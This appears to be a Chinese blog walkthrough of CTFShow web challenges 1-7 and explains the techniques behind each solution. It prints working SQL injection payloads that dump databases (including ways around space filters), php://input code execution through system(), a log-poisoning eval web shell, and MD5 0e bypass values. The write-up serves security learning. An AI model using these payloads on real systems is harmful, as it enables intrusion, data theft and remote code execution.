CTFShow WEB模块详细通关教程, 受篇幅所限, 通关教程分为上下两部分, 第一部分为1-7关, 第二部分为8-14关, 本篇博客为1-7关的通关教程, 从解题思路和原理剖析两个方面进行讲解

CTFShow web1-7关详细教程

解题思路
- CTFShow web签到题
- CTFShow web2
- CTFShow web3
- CTFShow web4
- CTFShow web5
- CTFShow web6
- CTFShow web7
原理剖析
- php://input伪协议
- 日志注入
- MD5加密漏洞-0e绕过
- 过滤空格的绕过方式

解题思路

CTFShow web签到题

这一关的重点在于注释, 由于开发人员的疏忽, 忘记删除注释中的敏感数据, 右键检查网页源码即可拿到 flag

CTFShow web2

第二关是一个SQL注入漏洞, 注入点为单引号字符型注入, 页面有显示位, 推荐使用联合注入, 这一关没有对用户输入的参数进行过滤, 难度相对较低

第一步, 判断注入点
用户名输入以下payload, 使SQL恒成立, 密码不用输

a' or true #

页面正常显示, 并且展示了登录成功后的用户名

接下来, 在用户名输入以下payload, 使SQL恒不成立, 密码还是不用输

a' or false #

页面空显示, 原来显示用户名的地方, 现在为空了, 这是因为我们输入的参数拼接到SQL中执行时, 使SQL变得横不成立, SQL查询不到用户的信息, 自然会空显示

由以上结果可知, 用户可以通过参数来控制SQL语句的执行结果, 故而存在SQL注入漏洞, 并且注入点为单引号字符型注入, 由于页面中有显示位( SQL查询的结果会在页面的固定位置显示), 推荐使用联合注入

第二步, 脱库
获取当前使用的数据库, 盲猜flag就在当前使用的数据库中, 用户名输入以下payload, 密码不用输

a' union select 1,database(),3 #

获取数据库web2中的表

a' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='web2'),3 #

获取表flag中的字段, 很明显flag就在flag表中

a' union select 1,(select group_concat(column_name) from information_schema.columns where table_schema='web2' and table_name='flag'),3 #

获取 flag

a' union select 1,(select flag from flag),3 #

CTFShow web3

第三关是一个文件包含漏洞, 推荐使用PHP://input伪协议进行任意代码执行

在url的参数中提交PHP伪协议

?url=php://input

使用代理工具( Burp Suite)抓包, 在POST请求体中输入需要执行的PHP代码, 比如执行系统命令:查看当前目录下的文件

<?php system('ls');?>

当前目录下有两个文件, 目测flag就在 ctf_go_go_go 文件中

接下来我们查看 ctf_go_go_go 文件, 获取 flag, url的参数中使用PHP伪协议

?url=php://input

使用代理工具( Burp Suite)拦截请求, 在POST请求体中传递需要执行的PHP代码

<?php system('cat ctf_go_go_go');?>

成功拿到 flag

CTFShow web4

第四关也是一个文件包含漏洞, 与第三关不同的是, 这一关过滤了PHP伪协议, 推荐使用日志注入

1.首先, 访问一下web服务器的日志文件( Nginx日志文件的默认位置是/var/log/nginx/access.log)

?url=/var/log/nginx/access.log

2.使用代理工具( Burp Suite)在请求头User-Agent的内容中插入后门

<?php eval($_POST['a']);?>

3.再次访问日志文件, 会发现新增了一条访问记录, 后门代码不会在页面中显示, 因为代码会被直接执行, 加下来我们使用蚁剑等工具链接后门即可

4.使用蚁剑的文件管理功能, 在网站根目录( www)下有一个 falg.txt, flag就在这个文件里面

CTFShow web5

第五关是一个MD5加密漏洞, 这一关需要传递两个参数, 如果两个参数的MD5值相等, 即可输出 flag, 推荐使用0e绕过

payload如下

?v1=QNKCDZO&v2=240610708

CTFShow web6

第六关是一个SQL注入漏洞, 注入类型为数值型注入, 页面有回显, 推荐使用联合注入, 源码中过滤了空格, 可以使用注释/**/ 或括号() 来绕过

1.使用万能账号测试注入点
括号()绕过, 用户名输入以下payload, 密码不用输

a'or(true)#

注释/**/绕过

a'/**/or/**/true/**/#

页面有显示位( 查询出来的用户在页面的固定位置展示), 推荐使用联合注入

2.脱库
获取当前数据库, 盲猜 flag 就在当前使用的数据库中, 用户名输入以下payload, 密码不用输

a'union/**/select/**/1,database(),3#

获取数据库中的表

a'union/**/select/**/1,(select(group_concat(table_name))from/**/information_schema.tables/**/where/**/table_schema='web2'),3#

获取表中的字段

a'union/**/select/**/1,(select(group_concat(column_name))from/**/information_schema.columns/**/where/**/table_schema='web2'and/**/table_name='flag'),3#

获取 flag

a'union/**/select/**/1,(select/**/flag/**/from/**/flag),3#

CTFShow web7

第七关也是一个SQL注入漏洞, 注入点是数值型注入, 页面有回显, 推荐使用联合注入, 源码中过滤了空格, 可以使用注释/**/ 或括号() 来绕过

1.判断注入点

url地址栏中输入以下payload, 是SQL恒成立, 可以查询到所有文章内容, 由此可证明存在SQL注入

?id=-1/**/or/**/true

页面存在显示位( 文章标题和文章内容在固定位置展示), 推荐使用联合注入

2.脱库
获取当前数据库, url中输入以下payload

-1/**/union/**/select/**/1,database(),3

获取数据库中的表

-1/**/union/**/select/**/1,(select/**/group_concat(table_name)from/**/information_schema.tables/**/where/**/table_schema="web7"),3

获取表中的字段

-1/**/union/**/select/**/1,(select/**/group_concat(column_name)from/**/information_schema.columns/**/where/**/table_schema="web7"and/**/table_name="flag"),3

获取 flag

-1/**/union/**/select/**/1,(select/**/flag/**/from/**/flag),3

原理剖析

解题过程中用到了两种文件包含漏洞的利用方式, 一种MD5加密的绕过方式, 一种SQL注入漏洞的绕过方式, 接下来, 针对这几种方式的实现原理解释一下

php://input伪协议

php://input伪协议是文件包含漏洞的一种利用方式, 在url的参数中使用伪协议时, 会将POST请求体中的内容当做文件来执行, 如果POST请求体中包含代码, 则代码会被正常执行, 从而造成任意代码执行, 具体使用情况参考web3的解题思路

日志注入

日志注入是文件包含漏洞的一种利用方式, web服务器的日志文件会保存网站的访问记录, 包括请求的源地址, 时间, 请求方式, User-Agent, Referer等HTTP请求头, 如果在这些请求头中插入代码, 则代码会被保存在web服务器的日志文件中, 当我们访问日志文件的时候, 文件中的代码则会被执行
本次用到了一个Nginx日志文件的默认路径:/var/log/nginx/access.log

MD5加密漏洞-0e绕过

md5()函数在加密时存在一些漏洞, 这主要是因为PHP在使用来比较字符串时, 如果字符串是以0e开头, 则会被当做科学计数法, 结果转换为0
比如web5中, 两个参数经过md5()函数加密后, 都是0e开头, 在参与PHP的比较时, 都会转换为0, 结果会变成0=0, 从而使比较成立, 除了上面使用的两个值以外, md5()函数加密后以0e开头的值还有
QNKCDZO
240610708
byGcY
sonZ7y
aabg7XSs
aabC9RqS
s878926199a
s155964671a
s214587387a
s1091221200a

过滤空格的绕过方式

SQL注入漏洞中, 经常会面对各种各样的过滤, 上面遇到的过滤空格的情况, 有两种常用的绕过方式
1.注释/**/绕过
2.括号()绕过

CTFShow web1-7——CTF秀WEB模块解题思路相关推荐

CTF Reverse fantasy.apk解题思路
CTF Reverse fantasy.apk解题思路一.文件分析二.解题思路一.文件分析文件和解题脚本看这里动态运行界面提示输入信息进行check chec按钮点击后出出现一个Toast, ...
[网络安全自学篇] 八十一.WHUCTF之WEB类解题思路WP（文件上传漏洞、冰蝎蚁剑、反序列化phar）
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步.前文分享了WHUCTF部分题目,包括代码审计.文件包含.过滤绕过.SQL注入.这篇文 ...
[网络安全自学篇] 八十.WHUCTF之WEB类解题思路WP（代码审计、文件包含、过滤绕过、SQL注入）
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步.前文分享了Windows PE病毒, 包括PE病毒原理.分类及感染方式详解,并通过案 ...
CTF中RSA常见解题思路
1. 直接分解模数N 直接分解模数N是最直接的攻击方法,也是最困难的方法.具体的解析同上RSA安全性分析. 如果n小于256bit,可以使用本地工具进行暴力分解,列入windows平台的RSATool ...
“百度杯”CTF比赛九月场 Upload解题思路
Hello,大家好,我是锘锘鸡. 今天分享给大家的是百度杯CTF比赛的Upload解题思路. 先看下题目提示flag就在flag.php中. 进入答题链接发现是文件上传,于是好奇的锘锘鸡开始了他的 ...
CTF学习-web解题思路
CTF学习-web题思路持续更新基础篇 1.直接查看源代码 2.修改或添加HTTP请求头常见的有: Referer来源伪造 X-Forwarded-For:ip伪造 User-Agent:用户代 ...
网络安全ctf比赛/学习资源整理，解题工具、比赛时间、解题思路、实战靶场、学习路线，推荐收藏！...
对于想学习或者参加CTF比赛的朋友来说,CTF工具.练习靶场必不可少,今天给大家分享自己收藏的CTF资源,希望能对各位有所帮助. CTF在线工具首先给大家推荐我自己常用的3个CTF在线工具网站,内容 ...
河南省网络安全高校战队联盟CTF训练营-web文件上传第一期
文件上传个人介绍姓名:飞羽 CTF菜菜一枚例题来源 ctfhub:https://www.ctfhub.com pwnthebox:https://insider.pwnthebox.com c ...
记一次院赛CTF的WEB题（入门级别）
目录签到一签到二口算小天才 easy php 录取查询我爱python Spring 这次院赛的题目比较基础,适合给刚入门CTF的小白提供一个大致CTF解题思路.(主要因为本人小白,表示能学到 ...
ctf训练 web安全暴力破解
ctf训练 web安全暴力破解暴力破解漏洞介绍穷举法的基本思想是根据题目的部分条件确定答案的大致范围,并在此范围内对所有可能的情况逐一验证,直到全部情况验证完毕.若某个情况验证符合题目的全部条件, ...

CTFShow web1-7——CTF秀WEB模块解题思路

CTFShow web1-7关详细教程

解题思路

CTFShow web签到题

CTFShow web2

CTFShow web3

CTFShow web4

CTFShow web5

CTFShow web6

CTFShow web7

原理剖析

php://input伪协议

日志注入

MD5加密漏洞-0e绕过

过滤空格的绕过方式

CTFShow web1-7——CTF秀WEB模块解题思路相关推荐

最新文章

热门文章